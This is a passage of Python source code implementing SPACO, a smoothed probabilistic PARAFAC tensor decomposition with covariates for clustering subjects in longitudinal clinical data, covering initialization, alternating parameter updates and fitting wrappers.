UGinit(self):\n        #column order V1Phi1, V1Phi2,...,V1PhiK,..., VKPhi1,...VKPhiK\n        self.Utmp = np.zeros((self.X.shape[0], self.Phi0.shape[1] * self.V0.shape[1]))\n        self.G = np.zeros((self.K, self.Phi0.shape[1], self.V0.shape[1]))\n        PhiV0 = np.kron(self.V0, self.Phi0)\n        for i in np.arange(self.X.shape[0]):\n            x0 = self.Xmodes['X1'][i, :]\n            o0 = self.Omodes['O1'][i, :]\n            o0 = np.where(o0 == 1)[0]\n            PhiV01 = PhiV0[o0, :]\n            x0 = x0[o0]\n            A = np.matmul(np.transpose(PhiV01),PhiV01) + self.eps * np.identity(PhiV0.shape[1])\n            a = np.matmul(np.transpose(PhiV01), x0)\n            self.Utmp[i,:] = np.linalg.solve(A, a)\n        np.random.seed(self.random_state)\n        tmp = np.linalg.svd(self.Utmp)\n        self.U0 = tmp[0][:,:self.K]\n        # tmp: K * (K^2)\n        tmp = np.matmul(np.transpose(self.U0), self.Utmp)\n        for k in np.arange(self.K):\n            for l in np.arange(self.V0.shape[1]):\n                ll = np.arange((l*self.Phi0.shape[1]),(l+1)*self.Phi0.shape[1])\n                self.G[k,:,l] = tmp[k,ll]\n    def Gparafac(self):\n        J = self.V0.shape[0]\n        T = self.Phi0.shape[0]\n        I = self.U0.shape[0]\n        V = np.zeros((J, self.K))\n        Phi = np.zeros((T, self.K))\n        PhiV = np.zeros((J*T, self.K))\n        Xhat = np.zeros((I, J*T))\n        errorsG = np.zeros((2))\n        np.random.seed(self.random_state)\n        parafacG_svd = parafac(tensor= self.G, rank = self.K, n_iter_max=10000,\n                               init='svd', svd='numpy_svd',random_state=self.random_state)[1]\n        ###calculate the reconstruction error\n        for k in np.arange(self.K):\n            V[:,k] = np.matmul(self.V0, parafacG_svd[2][:,k])\n            Phi[:, k] = np.matmul(self.Phi0,parafacG_svd[1][:,k])\n            PhiV[:,k] = np.kron(V[:, k].reshape((J, 1)),Phi[:, k].reshape((T, 1))).reshape(-1)\n        U, Xhat = Uconstruct(X1 = self.Xmodes['X1'], O1 = self.Omodes['O1'], PhiV = PhiV, eps = self.eps)\n        #Ghat = tl.cp_to_tensor(parafacG_svd)\n        errorsG[0] = np.mean((self.Xmodes['X1'][self.Omodes['O1']==1]-Xhat[self.Omodes['O1']==1])**2)\n        #random_num Random\n        if self.random_num > 0:\n            err_tmp = np.zeros(self.random_num)\n            np.random.seed(self.random_state)\n            seeds_rd = np.zeros(self.random_num, dtype = int)\n            for l in np.arange(self.random_num):\n                seeds_rd[l] = int(self.random_state + l)  # distinct seed per restart (the original added the constant random_num every time)\n            parafacG_rd_list = list()\n            for l in np.arange(self.random_num):\n                seed_everything(int(seeds_rd[l]))\n                parafacG_rd = parafac(tensor= self.G, rank = self.K, n_iter_max=100,\n                                      init='random', random_state =int(seeds_rd[l]))[1]\n                ###calculate the reconstruction error\n                for k in np.arange(self.K):\n                    V[:, k] = np.matmul(self.V0,parafacG_rd[2][:, k])\n                    Phi[:, k] = np.matmul(self.Phi0,parafacG_rd[1][:, k])\n                    PhiV[:, k] = np.kron(V[:, k].reshape((J, 1)),Phi[:, k].reshape((T, 1))).reshape(-1)\n                U, Xhat = Uconstruct(X1=self.Xmodes['X1'],O1=self.Omodes['O1'], PhiV=PhiV, eps=self.eps)\n                err_tmp[l] = np.mean((self.Xmodes['X1'][self.Omodes['O1']==1]-Xhat[self.Omodes['O1']==1])**2)\n                parafacG_rd_list.append(copy.deepcopy(parafacG_rd))\n            errorsG[1] = np.min(err_tmp)\n
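            # Editorial note (added): keep the random restart with the lowest reconstruction error.\n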
            parafacG_rd = parafacG_rd_list[np.argmin(err_tmp)]\n        else:\n            errorsG[1] = np.inf\n            parafacG_rd = parafacG_svd\n        # choose between the SVD initialization and the best random restart\n        if errorsG[1] < errorsG[0]:\n            parafacG = parafacG_rd\n        else:\n            parafacG = parafacG_svd\n        self.A = parafacG[0]\n        self.B = parafacG[1]\n        self.C = parafacG[2]\n    def transform(self):\n        J = self.V0.shape[0]\n        T = self.Phi0.shape[0]\n        I = self.U0.shape[0]\n        self.PhiV = np.zeros((J * T, self.K))\n        self.U = np.matmul(self.U0, self.A)\n        self.Phi = np.matmul(self.Phi0, self.B)\n        self.V = np.matmul(self.V0, self.C)\n        for k in np.arange(self.K):\n            a1 = np.sqrt(np.sum(self.Phi[:,k]**2))/self.phiNorm\n            a2 = np.sqrt(np.sum(self.V[:, k] ** 2)) / self.vNorm\n            self.Phi[:,k] = self.Phi[:,k]/a1\n            self.V[:,k] = self.V[:,k]/a2\n            self.PhiV[:, k] = np.kron(self.V[:, k].reshape((J, 1)),self.Phi[:, k].reshape((T, 1))).reshape(-1)\n        U, Xhat = Uconstruct(X1=self.Xmodes['X1'],O1=self.Omodes['O1'],PhiV=self.PhiV, eps=self.eps)\n        self.U = U.copy()\n        self.X1hat = Xhat.copy()\n    def varianceInit(self):\n        self.s2 = np.mean(self.U**2, axis = 0)\n        if self.homoNoise:\n            self.sigma2[:] = np.sum((self.X1hat[self.Omodes['O1']==1] - self.Xmodes['X1'][self.Omodes['O1']==1])**2)/np.sum(self.Omodes['O1'])\n    def run(self):\n        self.Vinit()\n        self.Phiinit()\n        self.UGinit()\n        self.Gparafac()\n        self.transform()\n        self.varianceInit()\n\n'''\nSPACO (Smoothed Probabilistic PARAFAC with covariates)\n\nIn many clinical studies, subjects are measured at different time points, and we\nare interested in identifying patient sub-clusters and the covariates that are\nimportant in the clustering step.\n\nArguments:\n@ X: I * T * J time series array.\n@ O: I * T * J indicator array of whether an observation is available.\n@ Z: I * q covariate matrix\n@ K: rank\n@ Omega: T * T smoothness penalty matrix\n@ H: T * T norm constraint matrix.\n@ Phi: T * K smooth principal components.\n@ V: J * K loadings for multivariate features.\n@ mu: I * K posterior means of the U matrix\n@ cov: I * K * K posterior covariance of the U matrix.\n@ beta: q * K coefficient matrix.\n@ sigmaF: length-K vector, variances for u_k.\n@ sigma: length-J vector, noise variances for X_j.\n@ lambda1: length-K vector, smoothness penalty.\n@ lambda2: length-K vector, sparsity penalty.\n'''\nclass SPACO():\n    def __init__(self, opts):\n        self.X = opts['X']\n        self.O = opts['O']\n        self.Z = opts['Z']\n        self.K = opts['K']\n        self.Omega = opts['Omega']\n        self.h = opts['h']\n        self.Phi = opts['Phi']\n        self.V = opts['V']\n        self.mu = opts['mu']\n        self.cov = opts['cov']\n        self.beta = opts['beta']\n        self.sigmaF = opts['sigmaF']\n        self.sigma = opts['sigma']\n        self.lambda1 = opts['lambda1']\n        self.lambda2 = opts['lambda2']\n        self.fit_intercept = opts[\"intercept\"]\n        self.orthogonal = opts[\"orthogonal\"]\n        self.num_subjects = self.X.shape[0]\n        self.num_times = self.X.shape[1]\n        self.num_features = self.X.shape[2]\n        self.intercepts = np.zeros((self.K))\n        self.intermediantes = {}\n        self.intermediantes['Xmod1'], self.intermediantes['O1'],\\\n        self.intermediantes['Xmod2'], self.intermediantes['O2'], \\\n        self.intermediantes['Xmod3'], self.intermediantes['O3']\\\n            = unfold(self.X, self.O)\n        self.transform_mat = np.zeros((self.num_subjects, self.K, self.K))\n        self.beta_folds = opts['beta_folds']\n        self.foldid = opts['foldid']\n        if self.foldid is None:\n            self.foldid = as_null()\n        self.transform_vec = np.zeros((self.num_subjects, self.K))\n        self.lam1_update = opts['lam1_update']\n        self.lam2_update = opts['lam2_update']\n        self.nlam1 = opts['nlam1']\n        self.nlam2 = opts['nlam2']\n        self.dfmin = opts['dfmin']\n
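        # Editorial note (added): dfmin/dfmax bound the effective degrees of freedom\n        # that penalty_search uses in PhiUpdate to build the candidate lambda1 grid.\n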
        self.dfmax = opts['dfmax']\n        self.intermediantes['lambda1s'] = None\n        self.intermediantes['selected'] = None\n        self.intermediantes['Phis'] = None\n        self.lam1criterion = opts['extra_sd']\n        self.homoNoise = opts['homoNoise']\n        self.time_checks = np.sum(self.O[:, :, 0], axis=0)\n        self.time_checks = np.where(self.time_checks>0)[0]\n    def check_init(self):\n        if self.Phi is None:\n            self.Phi = np.random.normal(size=(self.num_times, self.K))  # size= keyword; the bare tuple was parsed as loc\n        if self.h is None:\n            self.h = self.num_times\n        for k in np.arange(self.K):\n            l2norm = np.sqrt(np.sum(self.Phi[:,k] ** 2)/self.h)\n            self.Phi[:, k] = self.Phi[:, k]/l2norm\n        if self.V is None:\n            self.V = np.random.normal(size=(self.num_features, self.K))  # size= keyword, as above\n        for k in np.arange(self.K):\n            l2norm = np.sqrt(np.sum(self.V[:,k] ** 2))\n            self.V[:, k] = self.V[:, k]/l2norm\n        if self.beta is None:\n            if self.Z is not None:\n                self.beta = np.zeros((self.Z.shape[1], self.K))\n        if self.mu is None:\n            self.mu = np.zeros((self.num_subjects, self.K))\n        if self.cov is None:\n            self.cov = np.zeros((self.num_subjects, self.K, self.K))\n        if self.sigmaF is None:\n            self.sigmaF = np.ones((self.K)) * 10**8\n        if self.lambda1 is None:\n            self.lambda1 = np.zeros((self.K))\n        if self.lambda2 is None:\n            self.lambda2 = np.zeros((self.K))\n        if self.sigma is None:\n            self.sigma = np.ones((self.num_features))\n            #for j in np.arange(self.num_features):\n                #x = self.intermediantes['Xmod2'][j,:]\n                #self.sigma[j] = np.nanvar(x)\n        if self.orthogonal is None:\n            self.orthogonal = 2*np.sqrt(self.num_subjects)*np.log(self.num_subjects*self.num_times*self.num_subjects)\n    def posteriorU(self, meanOnly = False):\n        PhiV = np.zeros((self.num_times * self.num_features, self.K))\n        # O(KTJ)\n        s2 = np.zeros((self.num_times * self.num_features))\n        for j in np.arange(self.num_features):\n            ll = np.arange(j * self.num_times,\n                           (j + 1) * self.num_times)\n            s2[ll] = self.sigma[j]\n        for k in np.arange(self.K):\n            PhiV[:, k] = np.kron(\n                self.V[:, k].reshape(self.num_features, 1),\n                self.Phi[:, k].reshape(\n                    (self.num_times, 1))).reshape(-1)\n        # O(I (|n_i| K^2 + JT))\n        for i in np.arange(self.num_subjects):\n            xte0 = self.intermediantes['Xmod1'][i, :]\n            obs0 = self.intermediantes['O1'][i, :]\n            obs0 = np.where(obs0 == 1)[0]\n            PhiV0 = PhiV[obs0, :]\n            xte0 = xte0[obs0]\n            s20 = s2[obs0]\n            tmp1 = np.matmul(np.transpose(PhiV0) / s20,PhiV0)\n            tmp2 = np.matmul(np.transpose(PhiV0),xte0 / s20)\n            tmp3 = np.zeros((self.K))\n            M = np.diag(1.0/self.sigmaF)\n            tmp4 = tmp1 + M\n            tmp4 = np.linalg.inv(tmp4)\n            if not meanOnly:\n                self.cov[i, :, :] = tmp4.copy()\n            M = M - np.matmul(np.matmul(M, self.cov[i,:,:]), M)\n            if self.Z is not None:\n                tmp3 = np.matmul(self.Z[i,],self.beta) / self.sigmaF\n                if self.fit_intercept:\n                    tmp3 = tmp3 + self.intercepts / self.sigmaF\n            self.mu[i, :] = np.matmul(self.cov[i, :, :],tmp2 + tmp3)\n            self.transform_mat[i,:, :] = M.copy()\n            self.transform_vec[i,:] = np.matmul(np.matmul(tmp2, self.cov[i,:,:]),np.diag(1.0/self.sigmaF))\n    def proximalPhi(self, x0, A, b, lam1, tol, max_iter):\n        Alam = A + lam1 * self.Omega\n        # proximal gradient descent with constraints Phi_k^THPhi_k = 1\n        tmp = np.linalg.svd(Alam)[1]\n        L = np.max(tmp)\n        tol0 = tol / np.sqrt(self.num_times)\n        phi0 = x0.copy()\n        err0 = 2 * tol0\n        it0 = 0\n        max_iter0 = max_iter * 10\n        while it0 < max_iter0 and err0 > tol0:\n            phi = phi0 - 1.0 / L * (np.matmul(Alam, phi0) - b)\n            phi = phi / np.sqrt(np.sum(phi ** 2) / self.num_times)\n            err0 = np.sum((phi - phi0) ** 2)\n            it0 += 1\n            phi0 = phi.copy()\n        return phi0\n    ### Phi update with smoothness penalty\n    def PhiUpdate(self, max_iter, tol):\n
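        # Editorial note (added): each smooth component phi_k is refit by proximal\n        # gradient descent under the norm constraint, with an optional search over a\n        # lambda1 path when lam1_update is set (see the loop below).\n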
        A0 = np.zeros((self.num_subjects * self.num_features, self.K))\n        for k in np.arange(self.K):\n            A0[:,k] = np.kron(self.V[:,k].reshape((self.num_features, 1)),\\\n                              self.mu[:,k].reshape((self.num_subjects, 1))).reshape(-1)\n        s2 = np.zeros((self.num_subjects * self.num_features))\n        for i in np.arange(self.num_subjects):\n            ll = np.arange((i * self.num_features), (i+1)*self.num_features)\n            s2[ll] = self.sigma.copy()\n        cross0 = np.zeros((self.K, self.num_times))\n        cross11 = np.zeros((self.K, self.K,self.num_times))\n        cross12 = np.zeros((self.K, self.K, self.num_times))\n        for k in np.arange(self.K):\n            for t in np.arange(self.num_times):\n                x0 = self.intermediantes['Xmod3'][t,:]\n                x1 = A0[:,k]\n                obs0 = np.where(self.intermediantes['O3'][t,:]==1)[0]\n                cross0[k,t] = np.sum(x0[obs0] * x1[obs0]/s2[obs0])\n                for l in np.arange(self.K):\n                    if l <= k:\n                        x0 = self.mu[:,k]\n                        x1 = self.mu[:,l]\n                        x3 = self.cov[:,k,l]\n                        x4 = self.V[:,k]\n                        x5 = self.V[:,l]\n                        obs1 = np.where(self.O[:, t, 0] == 1)[0]\n                        cross11[k,l,t] = np.sum(x0[obs1] * x1[obs1])\n                        cross12[k,l,t] = np.sum(x3[obs1])\n                        cross11[k,l,t] *= np.sum(x4 * x5/self.sigma)\n                        cross12[k, l, t] *= np.sum(x4 * x5 / self.sigma)\n                        cross11[l,k,t] = cross11[k,l,t]\n                        cross12[l, k, t] = cross12[k, l, t]\n        # O(KITJ)\n        Phi = self.Phi.copy()\n        Phi_ = Phi.copy()\n        it = 0\n        err = 2 * tol\n        A1 = np.zeros((self.num_times, self.num_times, self.K))\n        for k in np.arange(self.K):\n            for t in np.arange(self.num_times):\n                A1[t, t, k] = cross11[k, k, t] + cross12[k, k, t]\n        if self.lam1_update:\n            ##generate candidate\n            self.intermediantes['lambda1s'] = np.zeros(\n                (self.nlam1, self.K))\n            self.intermediantes['selected'] = np.zeros(\n                (self.K))\n            self.intermediantes['Phis'] = np.zeros(\n                (self.num_times, self.nlam1, self.K))\n            lam1s = np.zeros((self.nlam1, self.K))\n            dfs = self.dfmin + (1.0 - np.arange(self.nlam1) / (\n                self.nlam1 - 1.0)) * (self.dfmax - 1.0)\n            for k in np.arange(self.K):\n                for l in np.arange(self.nlam1):\n                    df_hat, lam1s[l,k] = penalty_search(A1[:,:,k], self.Omega,\n                                                        df0=dfs[l],\n                                                        tol=1e-4,max_iter=100)\n        while it < max_iter and err > tol:\n            for k in np.arange(self.K):\n                A2 = np.zeros((self.num_times, self.num_times))\n                b = np.zeros((self.num_times))\n                for l in np.arange(self.K):\n                    if l != k:\n                        b -= (cross11[k, l, :] + cross12[k,l,:]) * Phi[:, l]\n                        A2 += self.orthogonal * np.matmul(\n                            Phi[:, l].reshape((self.num_times, 1)),\n                            Phi[:, l].reshape((1, self.num_times)))\n                b += cross0[k, :]\n                A1diag = np.diag(A1[:,:,k])\n                phi_best = b.copy()\n                for t in self.time_checks:\n                    phi_best[t] = phi_best[t]/A1diag[t]\n                if self.lam1_update:\n                    ##generate candidate\n                    fittedPhik = np.zeros((self.num_times,self.nlam1))\n                    errors = np.zeros((self.num_times, self.nlam1))\n                    for l in np.arange(self.nlam1):\n                        #consider the unconstrained version and A2 = 0,\n                        # which is a normal ridge regression problem\n                        phi = self.proximalPhi(self.Phi[:,k], A1[:,:,k]+A2, b, lam1s[l,k], tol,max_iter)\n                        fittedPhik[:,l] = phi.copy()\n                        phi0 = np.linalg.solve(A1[:,:,k]+lam1s[l,k] * self.Omega, b)\n                        H = np.matmul(np.linalg.inv(A1[:,:,k]+lam1s[l,k]*self.Omega), A1[:,:,k])\n                        for t in self.time_checks:\n                            errors[t,l] = (phi0[t] - phi_best[t])**2/(1.0 - H[t,t])**2\n                    errors_mean = np.mean(errors,axis = 0)\n                    errors_sd = np.sqrt(np.var(errors,axis = 0)/self.num_times)\n                    c = np.min(errors_mean + errors_sd * self.lam1criterion)\n                    self.intermediantes['Phis'][:,:,k] = fittedPhik.copy()\n                    idx = np.where(errors_mean<=c)[0]\n                    idx = np.max(idx)\n                    self.lambda1[k] = lam1s[idx,k]\n
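                    # Editorial note (added): the index chosen above keeps the largest\n                    # lambda1 whose error is within lam1criterion standard errors of the\n                    # minimum, a one-standard-error-type rule.\n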
                    self.intermediantes['selected'][k] = idx\n                    self.intermediantes['lambda1s'][:,k] = lam1s[:,k].copy()\n                    Phi[:,k] = fittedPhik[:,idx].copy()\n                else:\n                    Phi[:,k] = self.proximalPhi(self.Phi[:,k], A1[:,:,k]+A2, b, self.lambda1[k], tol,max_iter)\n            it = it + 1\n            err = np.sum((Phi_ - Phi) ** 2)\n            Phi_ = Phi.copy()\n        delta = np.sum((Phi_- self.Phi)**2)\n        self.Phi = Phi_.copy()\n        return delta\n    def Vupdate(self, max_iter = 20,tol=1e-2):\n        #precalculation of large matrices used\n        A0 = np.zeros((self.num_subjects * self.num_times, self.K))\n        for k in np.arange(self.K):\n            A0[:,k] = np.kron(self.Phi[:,k].reshape((self.num_times, 1)),\n                              self.mu[:,k].reshape((self.num_subjects, 1))).reshape(-1)\n        cross0 = np.zeros((self.K, self.num_features))\n        cross1 = np.zeros((self.K, self.K, self.num_features))\n        for k in np.arange(self.K):\n            for j in np.arange(self.num_features):\n                x0 = self.intermediantes['Xmod2'][j,:]\n                x1 = A0[:,k]\n                obs0 = np.where(self.intermediantes['O2'][j, :] == 1)[0]\n                cross0[k,j] = np.sum(x0[obs0] * x1[obs0])/self.sigma[j]\n                for l in np.arange(self.K):\n                    if l <= k:\n                        x0 = A0[:, k]\n                        x1 = A0[:, l]\n                        x3 = self.cov[:,k,l]\n                        cross1[k,l,j] = np.sum(x0[obs0] * x1[obs0])\n                        for t in np.arange(self.num_times):\n                            ii = np.arange(self.num_subjects)[self.O[:,t,j]==1]\n                            cross1[k,l,j] += np.sum(x3[ii] * self.Phi[t,k] * self.Phi[t,l])\n                        cross1[l,k,j] = cross1[k,l,j]\n                cross1[:,:,j] = cross1[:,:,j]/self.sigma[j]\n        it = 0\n        err = 2 * tol\n        V = self.V.copy()\n        V_ = V.copy()\n        while it < max_iter and err > tol:\n            for k in np.arange(self.K):\n                A = cross1[k,k,:]\n                b = np.zeros((self.num_features))\n                for l in np.arange(self.K):\n                    if l != k:\n                        b -= cross1[k,l,:] * self.V[:,l]\n                b += cross0[k,:]\n                # proximal gradient descent with constraints Phi_k^THPhi_k = 1\n                L = np.max(A) * 2\n                tol0 = tol/np.sqrt(self.num_features)\n                v0 = self.V[:, k].copy()\n                err0 = 2 * tol0\n                it0 = 0\n                max_iter0 = max_iter * 10\n                while it0 < max_iter0 and err0 > tol0:\n                    v = v0 - 1.0/L * (v0 * A - b)\n                    v = v/np.sqrt(np.sum(v**2))\n                    err0 = np.sum((v - v0)**2)\n                    it0 += 1\n                    v0 = v.copy()\n                V[:,k] = v0.copy()\n            it = it + 1\n            err = np.sum((V_ - V)**2)\n            V_ = V.copy()\n        delta = np.sum((V_- self.V)**2)\n        self.V = V_.copy()\n        return delta\n    def betaUpdate(self):\n        self.beta, self.intercepts, self.lambda2 = beta_fit(Z = self.Z, transform_mat = self.transform_mat,\n                      transform_vec = self.transform_vec, beta = self.beta,\n                      intercepts = self.intercepts, lambda2 = self.lambda2, fit_intercept=self.fit_intercept,\n                      lam2_update=self.lam2_update, nlam2=self.nlam2, nfolds=self.beta_folds, foldid = self.foldid,\n                      max_iter=1, tol=0.01)\n    def sigmaUpdate(self):\n        sigma = np.zeros((self.num_features))\n        A0 = np.zeros((self.num_subjects * self.num_times, self.K))\n        A1 = np.zeros((self.K, self.K))\n        for k in np.arange(self.K):\n            A0[:,k] = np.kron(self.mu[:,k].reshape((self.num_subjects,1)),\\\n                              self.Phi[:,k].reshape((self.num_times,1))).reshape(-1)\n        obs0 = np.where(self.intermediantes['O2'][0, :]==1)[0]\n        for k in np.arange(self.K):\n            for l in np.arange(self.K):\n                if l <= k:  # lower triangle only, mirrored below ('l <= self.K' was always true)\n                    A1[k,l] = np.sum(A0[obs0,k] * A0[obs0,l])\n                    x1 = self.cov[:,k,l]\n                    for t in np.arange(self.num_times):\n                        ii = np.arange(self.num_subjects)[self.O[:, t, 0] == 1]\n                        A1[k, l] += np.sum(x1[ii] * self.Phi[t, k] * self.Phi[t, l])\n                    A1[l, k] = A1[k,l]\n        tmp1 = 0.0\n        tmp2 = 0.0\n        for j in np.arange(self.num_features):\n            x = self.intermediantes['Xmod2'][j,:]\n            x1 = np.matmul(A0, self.V[j,:])\n            tmp = np.sum(np.matmul(self.V[j,].reshape((1,self.K)), A1) * self.V[j,:])\n
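            # Editorial note (added): the residual sum of squares below includes the\n            # posterior-covariance correction term tmp; with homoNoise a single pooled\n            # variance (tmp1/tmp2) is shared across features.\n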
            tmp3 = (np.sum(x[obs0]**2) - 2 * np.sum(x[obs0] * x1[obs0]) + tmp)\n            tmp4 = float(len(obs0))\n            sigma[j] = tmp3/tmp4\n            tmp1 += tmp3\n            tmp2 += tmp4\n        if self.homoNoise:\n            self.sigma[:] = tmp1/tmp2  # pooled totals; tmp3/tmp4 would use only the last feature\n    def sigmaFUpdate(self):\n        sigmaF = np.zeros((self.K))\n        fitted = np.zeros((self.num_subjects, self.K))\n        if self.Z is not None:\n            fitted = np.matmul(self.Z, self.beta)\n        if self.fit_intercept:\n            for k in np.arange(self.K):\n                fitted[:,k] += self.intercepts[k]\n        for i in np.arange(self.num_subjects):\n            tmp = (self.mu[i, :] - fitted[i,:])\n            sigmaF += tmp **2\n            sigmaF += np.diag(self.cov[i,:,:])\n        self.sigmaF = sigmaF / float(self.num_subjects)\n        #self.sigmaF = np.var(self.mu - fitted, axis=0)\n\n'''\nWrapper to run SPACO with a predefined SPACO object.\n'''\ndef SPACOfitSingle(self, max_iter, tol, nfolds0, max_iter0 = 5, trace = False,\n                   update_sigma = True, update_sigmaF = True, update_cov = True):\n    err = 2 * tol\n    it = 0\n    while it < max_iter and err > tol:\n        if trace:\n            print(\"iteration \"+str(it)+\" : \"+str(err))\n        delta2 = self.PhiUpdate(max_iter=max_iter ,tol=tol / 10.0)\n        delta1 = self.Vupdate(max_iter=max_iter, tol=tol/10.0)\n        self.posteriorU(meanOnly=(not update_cov))\n        if self.Z is not None:\n            #update beta\n            if not self.lam2_update:\n                self.betaUpdate()\n            else:\n                beta, intercepts, lambda2 = beta_fit(Z = self.Z, transform_mat = self.transform_mat,\n                       transform_vec = self.transform_vec, beta = self.beta,\n                       intercepts = self.intercepts, lambda2 = self.lambda2,\n                       fit_intercept=self.fit_intercept,lam2_update=self.lam2_update,\n                       nlam2=self.nlam2, nfolds=nfolds0,max_iter=max_iter0, tol=tol/10)\n                self.beta = beta.copy()\n                self.intercepts = intercepts.copy()\n                self.lambda2 = lambda2.copy()\n        if update_sigma:\n            self.sigmaUpdate()\n        if update_sigmaF:\n            self.sigmaFUpdate()\n        err = delta1 + delta2\n        it = it + 1\n    return self\n\n'''\nWrapper to run SPACO starting from the input data.\n'''\ndef SPACOfit(X, Obs, T0, Z, K = 3, nfolds0 = 5,foldid=None, init_type = \"pca\", random_num = 20,\n             nlambda0 = 20, lambda1 = None, lambda2 = None,\n             lam1_update = True, nlam1 = 20, dfmin = 1, dfmax = 10, nlam2 = 100,\n             kappa = 1e-2, orthogonal = 0, homoNoise = True,\n             fit_intercept = True, demean = True, trace = False, extra_sd = 1.0,\n             max_iter1 = 100, tol1 = 0.01, max_iter0 = 1, lam2_update = True,\n             random_state = 0, lasso_maxit = 1e4, intercept_scale = 1e2):\n    print(\"start data preparation:\")\n    Omega, h, R, B0, cv, lams, dfs = \\\n        prepare(X, Obs, T0, mean_removel=demean, nlam=nlambda0,\n                lams=None, kappa=kappa)\n    print(\"data preparation done.\")\n    ###initialization\n    print(\"start initialization:\")\n    I = R.shape[0]; T = R.shape[1]; J = R.shape[2]\n    initializer = initialization(X=R, OBS=Obs, T0=T0, K=K,eps=1.0 / np.sqrt(J * T),\n                                 homoNoise = homoNoise, random_num= random_num,\n                                 phiNorm = np.sqrt(h), vNorm= 1.0, random_state = random_state)\n    initializer.run()\n    print(\"initialization done.\")\n    opts = {}\n    opts['X'] = R; opts['O'] = Obs; opts['Z'] = Z; opts['K'] = K;\n    opts['Omega'] = Omega; opts['h'] = h; opts['Phi'] = initializer.Phi.copy();\n    opts['V'] = initializer.V.copy(); opts['mu'] = initializer.U.copy(); opts['cov'] = None;\n    opts['beta'] = None; opts['intercept'] = fit_intercept; opts['sigmaF'] = initializer.s2.copy(); opts['sigma'] = initializer.sigma2.copy();  # SPACO.__init__ reads the 'intercept' key; it was previously set to None\n    opts['lambda1'] = lambda1; opts['lambda2'] = lambda2;\n    opts['orthogonal'] = orthogonal; opts['lam1_update'] = lam1_update; opts['lam2_update'] = lam2_update;\n
    opts['nlam1'] = nlam1; opts['nlam2'] = nlam2; opts['dfmin'] = dfmin; opts['dfmax'] = dfmax;\n    opts['extra_sd'] = extra_sd; opts['homoNoise'] = initializer.homoNoise;\n    opts['beta_folds'] = nfolds0; opts['foldid'] = foldid\n    self = SPACO(opts)\n    self.check_init()\n    self.posteriorU()\n    if self.Z is not None and self.lam2_update:\n        self.lambda2 = np.zeros((self.K))\n        if self.fit_intercept:\n            x = np.hstack([self.Z, np.ones((self.num_subjects, 1))])\n        else:\n            x = self.Z\n        for k in np.arange(self.K):\n            penalty_factor = np.ones(x.shape[1])\n            if self.fit_intercept:\n                penalty_factor[x.shape[1] - 1] = 0.0\n            coefficients, lambda2min, cvm, cvsd, lambdas = my_cv_glmnet(x=x, y=self.mu[:,k],\n                                  penalty_factor=penalty_factor,\n                                  nlam=self.nlam2, nfolds=nfolds0)\n            p0 = len(coefficients)\n            if self.fit_intercept:\n                self.intercepts[k] = coefficients[p0-1]\n                p0 = p0-1\n            self.lambda2[k] = lambda2min\n            self.beta[:,k] = coefficients[:p0].copy()\n    # warm start: alternate beta, variance, and posterior updates before the main loop\n    tol_tmp = 1e-2\n    err = 2 * tol_tmp\n    sigmaF0 = self.sigmaF.copy()\n    it = 0\n    max_iter_tmp = 10\n    while err > tol_tmp and it < max_iter_tmp:\n        if self.Z is not None:\n            self.betaUpdate()\n        self.sigmaFUpdate()\n        self.sigmaUpdate()\n        self.posteriorU()\n        err = np.sum(np.abs(self.sigmaF - sigmaF0))\n        sigmaF0 = self.sigmaF.copy()\n        it += 1\n    print(\"warm start done.\")\n    self = SPACOfitSingle(self, max_iter = max_iter1, tol = tol1, max_iter0 = max_iter0, nfolds0=nfolds0, trace =trace)\n    self.posteriorU()\n    if self.Z is not None:\n        self.betaUpdate()\n    return self, R, B0, initializer\n\n\n\n\ndef cross_posterior(xte, ote, zte, s2, sigmaF, PhiV, beta = None, intercepts = None, fit_intercept = True):\n    K = PhiV.shape[1]\n    I = xte.shape[0]\n    mu = np.zeros((I, K))\n    cov = np.zeros((I, K, K))\n    transform_mat = np.zeros((I, K, K))\n    transform_vec = np.zeros((I, K))\n    temp_vec = np.zeros((I, K))\n    for i in np.arange(I):\n        xte0 = xte[i, :]\n        obs0 = ote[i,:]\n        obs0 = np.where(obs0 == 1)[0]\n        PhiV0 = PhiV[obs0, :]\n        xte0 = xte0[obs0]\n        s20 = s2[obs0]\n        tmp1 = np.matmul(np.transpose(PhiV0) / s20, PhiV0)\n        tmp2 = np.matmul(np.transpose(PhiV0), xte0 / s20)\n        tmp3 = np.zeros((K))\n        M = np.diag(1.0 / sigmaF)\n        tmp4 = tmp1 + M\n        tmp4 = np.linalg.inv(tmp4)\n        cov[i, :, :] = tmp4.copy()\n        M = M - np.matmul(np.matmul(M, cov[i, :, :]),M)\n        if zte is not None:\n            tmp3 = np.matmul(zte[i,],beta) / sigmaF\n            if fit_intercept:\n                tmp3 = tmp3 + intercepts / sigmaF\n        mu[i, :] = np.matmul(cov[i, :, :], tmp2 + tmp3)\n        transform_mat[i, :, :] = M.copy()\n        transform_vec[i, :] = np.matmul(np.matmul(tmp2, cov[i, :, :]),np.diag(1.0 / sigmaF))\n        temp_vec[i,:] = tmp2.copy()\n    return mu, cov, transform_vec, transform_mat, temp_vec\n\ndef permutation_align_greedy(cross_fit_obj, cor_mat):\n    orders = np.zeros(cross_fit_obj.K, dtype = int)\n    columns = np.arange(cross_fit_obj.K)\n    rows = np.arange(cross_fit_obj.K)\n    abs_cor_mat = np.abs(cor_mat)\n    idx_final = np.zeros(cross_fit_obj.K,dtype = int)\n    for it in np.arange(cross_fit_obj.K):\n        s1 = np.zeros(abs_cor_mat.shape[0])\n        s2 = np.zeros(abs_cor_mat.shape[0])\n        idx = np.zeros(abs_cor_mat.shape[0], dtype=int)\n        for k in np.arange(abs_cor_mat.shape[1]):\n            idx[k] = np.argmax(abs_cor_mat[:,k])\n            s1[k] = abs_cor_mat[idx[k],k]\n            if len(idx)>1:\n                s2[k] = np.max(np.delete(abs_cor_mat[:,k],idx[k]))\n            else:\n                s2[k] = 0.0\n        max_id = np.argmax(s1-s2)\n        orders[columns[max_id]] = rows[idx[max_id]].copy()\n        columns = np.delete(columns, max_id)\n        rows = np.delete(rows, idx[max_id])\n        abs_cor_mat = np.delete(abs_cor_mat, max_id, axis = 1)\n        abs_cor_mat = np.delete(abs_cor_mat, idx[max_id],axis=0)\n
